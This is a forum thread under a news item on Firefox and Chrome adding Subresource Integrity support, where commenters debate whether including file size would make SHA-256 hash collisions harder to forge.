Announcement

Collapse
No announcement yet.

Subresource Integrity Support Ready For Firefox 43, Chrome 45

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Subresource Integrity Support Ready For Firefox 43, Chrome 45

    Phoronix: Subresource Integrity Support Ready For Firefox 43, Chrome 45

    With the upcoming releases of the Mozilla Firefox and Google Chrome web-browsers is support for the W3C Subresource Integrity (SRI) specification...

    http://www.phoronix.com/scan.php?pag...Chrome-SRI-W3C

  • #2
    That's a very cool idea. However, I am surprised the spec doesn't include both the hash of the payload and also the size. From what little I understand, it's easier to match a target hash value if you can use any size you want.

    So say someone has 20,865 bytes of data and the hash (for the sake of this example) is 123456789. If the specification includes the hash and the size, then an attacker that wants to substitute a malicious value has to find some other 20,865 byte input that does what the attacker wants and also hashes to 123456789.

    But if the hash does not accompany the size, the attacker can write 500 bytes of evil Javascript (that loads more evil Javascript from another site) and then can try any combination of bytes from 1 to infinity to appended to his bad Javascript to match the target 123456789 hash. That's not easy, but it's orders of magnitude easier than working from a fixed size.

    https://en.wikipedia.org/wiki/Collision_attack

    Comment


    • #3
      Faking a good Hash (e.g. a SHA256) is already "practically impossible"... regardless of the file.

      The length will get you no further bonus because if you run for a collision attack, you could just start with a "all zero" file of the right length and count up without changing the files... which would still let you go nowhere because the hash number space is too large.

      Comment


      • #4
        As far as I understand it, the computational power required for an SHA256 calculation is dependent upon the size of the input. So if you have a 20k resource that must be matched by a 20k length fake, a potential attacker has to run SHA256 against 20k length inputs. If you have a 20k resource that can be matched by an any-length fake, an attacker can create the smallest possible hack that also pulls in its own payload of bad code and then run his SHA256 against 0.5k length inputs. In this example, he has a 40x speed advantage.

        Comment


        • #5
          But I've only got a superficial understanding. A 40x speed advantage may still be ten orders of magnitude (I'm pulling that number out of thin air, I have no idea) too few to make it computationally feasible to fake an input, in which case my objection isn't significant.

          Comment


          • #6
            Originally posted by Michael_S View Post
            As far as I understand it, the computational power required for an SHA256 calculation is dependent upon the size of the input.
            It is dependent, in the sense you have to sequentially run the input file through the hash algorithm. That's got very little to do with the difficulty of reversing the hash. Fixing the length of the file only tells an attacker exactly the file size he should be using.

            Comment


            • #7
              Originally posted by bug77 View Post

              It is dependent, in the sense you have to sequentially run the input file through the hash algorithm. That's got very little to do with the difficulty of reversing the hash. Fixing the length of the file only tells an attacker exactly the file size he should be using.
              Shouldn't the length of the file affect how many brute force attempts you can make to duplicate the hash in one second?

              Comment


              • #8
                Originally posted by Michael_S View Post

                Shouldn't the length of the file affect how many brute force attempts you can make to duplicate the hash in one second?
                It doesn't matter. Assuming the hash is cryptographically secure, which we think it is, there will never be enough computational resources to ever find a collision. That's the whole point. If this were something like a password hashing function, where we were trying to find the input that generated the hash, you'd have a point, but finding two different values that hash to the same thing just is not going to happen. If every message has equal probability of mapping to a particular value of output, then the probability of any message being a collision is roughly 1/2^256. If you could enumerate that, then even things like AES 128 bit keys start looking suspect.

                Comment


                • #9
                  Originally posted by Michael_S View Post
                  Shouldn't the length of the file affect how many brute force attempts you can make to duplicate the hash in one second?
                  With most hashes (like SHA256) : No it doesn't really.
                  Bascially: you precompute as much as possible from a constant file, and then only iterates on a small changing part.

                  In detail:
                  These hashes use a stream as an input, that the hash does process block by block.

                  So to brute force something of fixed size one needs to :

                  1. start computing the hash.
                  2. feed into the hash all the blocks up to fixed lenght, except for the last one (i.e.: feed the whole file minus the last 256 bits).
                  3. freeze the current state of the hash computing.
                  4. try one random guess a the last block
                  5. feed that block into hash computing.
                  6. compute final hash.
                  6.a ...if it matches target: we have a win.
                  6.b ...if it doens, reload the state forzen from step 3, and go back to 4.

                  (E.g.: that's how bitcoin mining is implemented).

                  File size doesn't really impact that much the run time.

                  Sha3 might be a tiny bit more complex with its sponge function.


                  Comment

                  Working...
                  X